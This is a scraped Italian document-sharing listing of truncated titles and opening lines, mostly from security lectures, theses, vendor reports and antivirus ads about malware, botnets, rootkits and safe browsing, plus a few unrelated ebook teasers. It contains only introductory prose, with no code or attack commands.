Mobile Insecurity Manno, 28 Settembre 2011 D Amato Luigi About us n Luigi D Amato: Senior CyberSecurity Consultant e CTO di Security Lab SAGL. Membro ufficiale del chapter italiano dell Honeynet Project
DettagliLA SACRA BIBBIA: OSSIA L'ANTICO E IL NUOVO TESTAMENTO VERSIONE RIVEDUTA BY GIOVANNI LUZZI
Read Online and Download Ebook LA SACRA BIBBIA: OSSIA L'ANTICO E IL NUOVO TESTAMENTO VERSIONE RIVEDUTA BY GIOVANNI LUZZI DOWNLOAD EBOOK : LA SACRA BIBBIA: OSSIA L'ANTICO E IL NUOVO Click link bellow and
DettagliISTR XV: FOCUS SULLA SITUAZIONE ITALIANA E NUOVI TREND
PER ULTERIORI INFORMAZIONI CONTATTARE: Emanuela Lombardo Gaia Fasciani Roberta Aliberti Viotti Symantec Italia Competence 02/241151 02/76281027 emanuela_lombardo@symantec.com aliberti@competencecommunication.com
DettagliDati in locale e dati in cloud. Dati in cloud : Pro e Contro Principali Virus e Malware Piattaforme per condividere Dati
Dati in locale e dati in cloud Dati in cloud : Pro e Contro Principali Virus e Malware Piattaforme per condividere Dati 1 Cloud: Vantaggi Maggiore protezione da virus Maggiore accessibilità Backup remoto
DettagliMicrosoft Security Intelligence Report
Microsoft Security Intelligence Report Da gennaio a giugno 2007 Riepilogo dei principali risultati Microsoft Security Intelligence Report (gennaio - giugno 2007) Riepilogo dei principali risultati Il Microsoft
DettagliNAVIGARE SICURI: LE TRAPPOLE DI INTERNET
NAVIGARE SICURI: LE TRAPPOLE DI INTERNET VIRUS, ANTIVIRUS, SPAM, FISHING: COME DIFENDERSI DALLE TRAPPOLE DELLA RETE SPAZIO GIOVANI COMEANA 15 MARZO 2016 DOTT. VINCENZO MERLUZZO VINCENZO.MERLUZZO@GMAIL.COM
DettagliSicurezza delle reti. Monga. Polimorfismo degli attacchi. Generatori di signature Hamsa. Cifratura. Sicurezza delle reti. Monga.
Sicurezza dei sistemi e delle 1 Mattia Lezione XI: Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2015/16 1 cba 2011 15 M.. Creative Commons Attribuzione Condividi
DettagliComputer Viruses and the WiCE Simulation Environment
Computer Viruses and the Simulation Environment Università degli Studi di Roma Tor Vergata Relatore Prof. Alberto Pettorossi Anno Accademico 2006/2007 I Malware I Malware Malware = Malicious Software Sono
DettagliIT Security 2. I principali tipi di malware possono essere classificati in tre categorie:
1 IT Security 2 Il termine Malware (maliciosus software) indica un programma maligno creato con l unico scopo di creare danni ad un computer (o a un insieme di computer), fargli compiere operazioni non
DettagliSemplicemente più protetti. Consigli per gli utenti.
Semplicemente più protetti Consigli per gli utenti www.avira.it Massima protezione contro le aggressioni: Avira ti protegge dai pericoli in rete La vita online diventa sempre più parte integrante della
DettagliSoftware. 454 Firma digitale 456 Antivirus 458 Software gestionale. 0000_P _1.indd /04/
Software 454 Firma digitale 456 Antivirus 458 Software gestionale 0000_P453-453_1.indd 453 01/04/2016 17.13.57 FIRMA DIGITALE Firma Digitale - Firmafacile Platinum B Firma Digitale - Firmafacile CNS Software
DettagliANALISI DELLE BOTNET DI NUOVA GENERAZIONE BASATE SU PEER TO PEER E IMPLEMENTAZIONE IN AMBIENTE EMULATO
UNIVERSITÀ DEGLI STUDI DI PARMA FACOLTÀ DI INGEGNERIA CORSO DI LAUREA SPECIALISTICA IN INGEGNERIA DELLE TELECOMUNICAZIONI ANALISI DELLE BOTNET DI NUOVA GENERAZIONE BASATE SU PEER TO PEER Relatore: Chiar.mo
DettagliMALWARE. Cos è un Malware
MALWARE Cos è un Malware Il termine Malware è l'abbreviazione di "malicious software", software dannoso. È un qualsiasi tipo di software indesiderato che viene installato senza consenso. Lo scopo di un
DettagliCome proteggere la vostra rete corporate in modo progressivo ed integrato
Come proteggere la vostra rete corporate in modo progressivo ed integrato Kaspersky Open Space Security È una suite di prodotti che offre copertura per tutte le reti, partendo dai dispositivi mobili sino
DettagliSicurezza Informatica
Sicurezza Informatica relatore: Simone Lazzaris responsabile datacenter presso Qcom Office Automation Il termine Office Automation si riferisce ai dispositivi e al software usato per creare, raccogliere,
DettagliQuick Heal Total Security per Mac. Protezione facile, veloce e continuativa per Mac.
Protezione facile, veloce e continuativa per Mac. Caratteristiche Principali Protezione dai virus veloce e molto reattiva. Protezione della Navigazione e Protezione Anti Phishing per tenere a bada siti
DettagliVirus di ieri e virus/malwaredi oggi quali pericoli per le aziende, gli enti e i professionisti
Virus di ieri e virus/malwaredi oggi quali pericoli per le aziende, gli enti e i professionisti Relatori: ing. Enrico Tonello, ing. Gianfranco Tonello Macerata, 22/06/2013 Cos è un virus/malware Software
DettagliCreiamo un account da amministratore ed attiviamo le condivisioni amministrative della macchina in questione. FILE: CreateAdmin_EnableAutoShare.
Quanti di voi si sono trovati nelle condizioni di dover mettere in condivisione su diverse macchine dei file? Sembrerebbe una cosa semplice e di facile attuazione, ma non sempre è così. Questa mattina
DettagliManutenzione del computer a livello software e tecniche di protezione anti malware Bologna - 26 novembre Elena Camerin
Manutenzione del computer a livello software e tecniche di protezione anti malware Bologna - 26 novembre 2013 - Elena Camerin Come utilizzare risorse disponibili in rete per abbassare la vulnerabilità
DettagliConnessioni sicure: ma quanto lo sono?
Connessioni sicure: ma quanto lo sono? Vitaly Denisov Contenuti Cosa sono le connessioni sicure?...2 Diversi tipi di protezione contro i pericoli del network.....4 Il pericolo delle connessioni sicure
DettagliTutta la famiglia dei processori Intel (x86) si basa ed e' compatibile con il primo processore di questo tipo: l'8086.
I processori Intel Tutta la famiglia dei processori Intel (x86) si basa ed e' compatibile con il primo processore di questo tipo: l'8086. L'8086 e' un processore a 16 bit quindi i suoi registri potranno
DettagliAvv. Giorgio Battaglini, Foro di Venezia Circolo dei Giuristi Telematici Camera Civile Veneziana
Avv. Giorgio Battaglini, Foro di Venezia Circolo dei Giuristi Telematici Camera Civile Veneziana SISTEMI INFORMATICI PER LA SICUREZZA DEI DATI DELLO STUDIO Avv. Giorgio Battaglini, Foro di Venezia Circolo
DettagliAvviso n. 85 Anagni, 26 gennaio 2016
MINISTERO DELL ISTRUZIONE, DELL UNIVERSITA E DELLA RICERCA UFFICIO SCOLASTICO REGIONALE PER IL LAZIO CONVITTO NAZIONALE REGINA MARGHERITA SCUOLA PRIMARIA, SCUOLA SECONDARIA DI I GRADO, LICEO LINGUISTICO,
DettagliCorso di Sistemi di Eleborazione Prof. N. Mazzocca
Corso di Sistemi di Eleborazione Prof. N. Mazzocca Attacchi alla sicurezza e Sistemi Anti-Intrusione Valentina Casola Introduzione PARTE 1: Definizioni e tassonomia di attacchi: Virus, Worm Trojan Horse.
DettagliContent Security Spam e nuove minacce
Content Security Spam e nuove minacce Alessio L.R. Pennasilico - apennasilico@clusit.it Antonio Ieranò - antonio.ierano@cisco.com Security Summit 16 Marzo 2010 ATA Hotel Executive, Milano Alessio L.R.
DettagliVirus e minacce informatiche
Virus e minacce informatiche Introduzione L utilizzo quotidiano della rete Internet è ormai molto intenso e spesso irrinunciabile e riguarda milioni di utenti. La sempre maggiore diffusione della posta
DettagliQuick Heal AntiVirus Pro. Duro con il malware, leggero sul PC.
Duro con il malware, leggero sul PC. Caratteristiche Quick Heal Grazie al Motore di Scansione ulteriormente migliorato, Quick Heal tiene costantemente protetto il tuo PC senza rallentarlo. Anti Ransomware
DettagliIntroduzione a Internet e cenni di sicurezza. Dott. Paolo Righetto 1
Introduzione a Internet e cenni di sicurezza Dott. Paolo Righetto 1 Introduzione a Internet e cenni di sicurezza Quadro generale: Internet Services Provider (ISP) Server WEB World Wide Web Rete ad alta
DettagliSeqrite Antivirus per Server
Scansioni Antivirus Ottimizzate Leggero Tecnologicamente avanzato Panoramica Prodotto Un antivirus concepito appositamente per i server aziendali. Semplice installazione, scansioni antivirus ottimizzate,
DettagliLe nuove minacce - L'evoluzione del Malware e del Cybercrime Antonio Forzieri CISSP, CISA, CISM
Le nuove minacce - L'evoluzione del Malware e del Cybercrime Antonio Forzieri CISSP, CISA, CISM Security Practice Manager Technology Sales Organization 1 I grandi temi del 2010 lo scenario Globale delle
DettagliLa sicurezza: le minacce ai dati
I.S.I.S.S. Sartor CASTELFRANCO V.TO Tecnologie dell'informazione e della Comunicazione La sicurezza: le minacce ai dati Prof. Mattia Amadori Anno Scolastico 2015/2016 Le minacce ai dati (1) Una minaccia
DettagliMS WORD 2000 ULTIMA VULNERABILITA SCOPERTA
SEGNALAZIONE DEL 05/09/2006 (LIVELLO DI RISCHIO 3 SU 5) MS WORD 2000 ULTIMA VULNERABILITA SCOPERTA INTRODUZIONE : Negli ultimi mesi sono state segnalate, a livello mondiale, numerose attività intese a
Dettagli1 Concetti di base... 3
1. Concetti di base 2. Gli attacchi informatici 3. Sicurezza informatica 4. L'attività di Ethical Hacking Syllabus rev. 1.0 1 Concetti di base... 3 1.1 Concetti di base di sicurezza informatica... 3 1.1.1
DettagliMIE1330 Supporto utenti e troubleshooting di client MS Windows 7 e MS Office 2007
Tel. +39 02 365738 info@overneteducation.it www.overnet.azurewebsites.net MIE1330 Supporto utenti e troubleshooting di client MS Windows 7 e MS Office 2007 Durata: 3 gg Descrizione E un corso progettato
DettagliUNO STUDIO SISTEMATICO DELLE INCONSISTENZE NEI NOMI DEI MALWARE
POLITECNICO DI MILANO Facoltà di Ingegneria Corso di Laurea Specialistica in Ingegneria Informatica UNO STUDIO SISTEMATICO DELLE INCONSISTENZE NEI NOMI DEI MALWARE Relatore: Prof. Stefano ZANERO Correlatori:
DettagliBitDefender Business Security
BitDefender Business Security BitDefender Business Security è una soluzione di gestione potente e facile da usare per la sicurezza delle aziende, che offre una protezione proattiva contro virus, spyware,
DettagliEsempi di intrusioni reali.. Esempi di intrusioni
Esempi di intrusioni reali.. relatore: Igor Falcomatà Client side attacks, covert channels, social networks,.. - come cambiano gli attacchi e quanto sono efficiaci le misure di sicurezza tradizionali (firewall,
DettagliQuick Heal AntiVirus Pro. Duro con il malware, leggero sul PC.
Duro con il malware, leggero sul PC. Caratteristiche Quick Heal Grazie al Motore di Scansione ulteriormente migliorato, Quick Heal tiene costantemente protetto il tuo PC senza rallentarlo. DNAScan avanzato
DettagliUNIVERSITÀ DEGLI STUDI DI TORINO
STEP BY STEP INSTRUCTIONS FOR COMPLETING THE ONLINE APPLICATION FORM Enter the Unito homepage www.unito.it and click on Login on the right side of the page. - Tel. +39 011 6704425 - e-mail internationalexchange@unito.it
DettagliSoftware. 484 Firma digitale 485 Antivirus 487 PC Utility
Software 484 Firma digitale 485 Antivirus 487 PC Utility Firma digitale A Firma Digitale - Firmafacile Platinum B Firma Digitale - Firmafacile CNS Software Per coloro che hanno la necessità di emettere
DettagliLa Sicurezza Online. Quando il rischio diventa un opportunità di business. Luigi Altavilla, Head of Antifraud Security Department, Global Operations
La Sicurezza Online Quando il rischio diventa un opportunità di business Luigi Altavilla, Head of Antifraud Security Department, Global Operations Roma, 14 giugno 2010 Retail Network Italy rappresenta
DettagliCorso di Sicurezza su Reti 2. Le Botnet
Corso di Sicurezza su Reti 2 Le Botnet Docente: Alfredo de Santis Studente: di Chiara Gabriele Outline I nuovi attacchi alla rete Cos'è una Botnet Ciclo di vita di un Bot Attacchi di una Botnet Infiltrarsi
DettagliCome GUADAGNARE E GESTIRE BITCOIN (Italian Edition) By Alessandro Bersia;Giuseppe Silano
Come GUADAGNARE E GESTIRE BITCOIN (Italian Edition) By Alessandro Bersia;Giuseppe Silano If searched for a ebook Come GUADAGNARE e GESTIRE BITCOIN (Italian Edition) by Alessandro Bersia;Giuseppe Silano
DettagliUniversità degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2011/2012. Rootkit.
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2011/2012 Rootkit Alessandro Reina Aristide Fattori
DettagliQuick Heal Internet Security. Home Banking, Acquisti e Navigazione Online senza pensieri.
Home Banking, Acquisti e Navigazione Online senza pensieri. Caratteristiche Metti al sicuro le tue attività su Internet come la navigazione, le transazioni bancarie, lo shopping, le email e i download.
DettagliPTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato
La scelta migliore per chi vuole diventare un Penetration Tester PTSv2 in breve: Online, accesso flessibile e illimitato 900+ slide interattive e 3 ore di lezioni video Apprendimento interattivo e guidato
DettagliI CAMBIAMENTI PROTOTESTO-METATESTO, UN MODELLO CON ESEMPI BASATI SULLA TRADUZIONE DELLA BIBBIA (ITALIAN EDITION) BY BRUNO OSIMO
I CAMBIAMENTI PROTOTESTO-METATESTO, UN MODELLO CON ESEMPI BASATI SULLA TRADUZIONE DELLA BIBBIA (ITALIAN EDITION) BY BRUNO OSIMO READ ONLINE AND DOWNLOAD EBOOK : I CAMBIAMENTI PROTOTESTO-METATESTO, UN MODELLO
DettagliLA SICUREZZA INFORMATICA SU INTERNET NOZIONI DI BASE SU INTERNET
NOZIONI DI BASE SU INTERNET Internet Services Provider (ISP) Server WEB World Wide Web Rete ad alta velocità (fibra ottica). Dott. Paolo Righetto 1 NOZIONI DI BASE SU INTERNET Ogni computer connesso su
DettagliQuali diritti per i bambini? RAGAZZI NELLA RETE. Navigazione sicura: strumenti e consigli
Quali diritti per i bambini? RAGAZZI NELLA RETE Navigazione sicura: strumenti e consigli Gianluigi Trento 30/11/2010 Alcune considerazioni Terre des hommes, organizzazione tra le più attive nella protezione
DettagliM ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa
M ODULO 7 - SYLLABUS 1.0 IT Security Corso NUOVA ECDL 2015 prof. A. Costa Minacce ai dati 1 Concetti di sicurezza Differenze fra dati e informazioni Il termine crimine informatico: intercettazione, interferenza,
DettagliLa sicurezza informatica. Luca Filippi Luca.Filippi@seclab.it
La sicurezza informatica Luca Filippi Luca.Filippi@seclab.it Che cos è SecLab 04/04/2015 http://www.seclab.it 2 Che cos è la sicurezza informatica Le informazioni vanno protette contro chi vuole appropriarsene
DettagliAccesso sicuro, Trattamento Sicuro
dic-17 GDPR Accesso sicuro, Trattamento Sicuro Art 32 Sicurezza del trattamento Tenendo conto dello stato dell'arte e dei costi di attuazione, nonché della natura, dell'oggetto, del contesto e delle finalità
DettagliLe tecnicheinformaticheper la sottrazionedidatiriservati
Le tecnicheinformaticheper la sottrazionedidatiriservati Cosimo Anglano Dipartimento di Informatica & Centro Studi Interdipartimentale sulla Criminalitá Informatica Universitá del Piemonte Orientale Alessandria
DettagliWindows XP e violazione norma sulla privacy
Windows XP e violazione norma sulla privacy Windows XP e violazione norma sulla privacy A partire dall 8 aprile 2014, Microsoft ha terminato di fornire aggiornamenti di sicurezza sul sistema operativo
DettagliPadova18 feb09 Presentazione suite escan 10 SATA HTS - Microworld
Padova18 feb09 Presentazione suite escan 10 SATA HTS - Microworld Tommaso Bon Responsabile escan tbon@sata-hts.com 3346764894 Diana Baron Supporto tecnico evasione licenze dbaron@sata-hts.com 0432979317
DettagliNOTA: I prezzi disponibili non sono comprensivi di IVA né di costi di Setup* SERVIZI CLOUD. IntactMail Posta Sicura
NOME E DESCRIZIONE PREZZO NOTA: I prezzi disponibili non sono comprensivi di IVA né di costi di Setup* SERVIZI CLOUD IntactMail Posta Sicura Casella 20 GB 8,00/mese Filtro Anti-Spam Avanzato e Protezione
DettagliAntonio Fini. Il Cloud a scuola. Antonio Fini
Antonio Fini Il Cloud a scuola Antonio Fini Desktop vs Cloud Che software utilizzate per scrivere una email? Cosa utilizzate per scrivere un testo/presentazione/foglio di calcolo? Qualcuno usa ancora chiavette
DettagliVIRUS: MYDOOM. Mydoom è un worm che si diffonde attraverso la posta elettronica in un messaggio con
VIRUS: MYDOOM 1. INTRODUZIONE: Sebbene il virus Mydoom non produca perdita di dati, abbiamo creduto opportuno realizzare questa relazione sulla sua azione per la gran ripercussione sociale che la sua enorme
DettagliCome capire se un sito web è INFETTO.
Come capire se un sito web è INFETTO. Guida + Checklist Valentino Gagliardi Supporto Tecnico @ ServerManaged.it @valentinogag Photo credit: Johnson Cameraface / Foter.com / CC BY-NC-SA I siti web sono
DettagliNorton AntiVirus 2009 con Antispyware Sicurezza intelligente, progettata per la velocità
Norton AntiVirus 2009 con Antispyware Sicurezza intelligente, progettata per la velocità Grazie a una difesa rapida e continua dalle minacce nocive, Norton AntiVirus 2009 garantisce la protezione del tuo
DettagliICSA Labs testa le Tecnologie TruPrevent TM
ICSA Labs testa le Tecnologie TruPrevent TM ICSA Labs ha determinato che le Tecnologie TruPrevent TM sviluppate da Panda Software e presenti nei suoi prodotti antivirus forniscono un livello di protezione
DettagliIl software. Il software. Dott. Cazzaniga Paolo. Dip. di Scienze Umane e Sociali paolo.cazzaniga@unibg.it
Il software Dip. di Scienze Umane e Sociali paolo.cazzaniga@unibg.it Outline 1 Il software Outline Il software 1 Il software Algoritmo Sequenza di istruzioni la cui esecuzione consente di risolvere uno
DettagliAssembly. Modello x86
Assembly Modello x86 1 Il microprocessore Un MICROPROCESSORE è un circuito integrato dotato di una struttura circuitale in grado di attuare un prefissato SET di ISTRUZIONI 2 Caratteristiche del microprocessore
Dettagli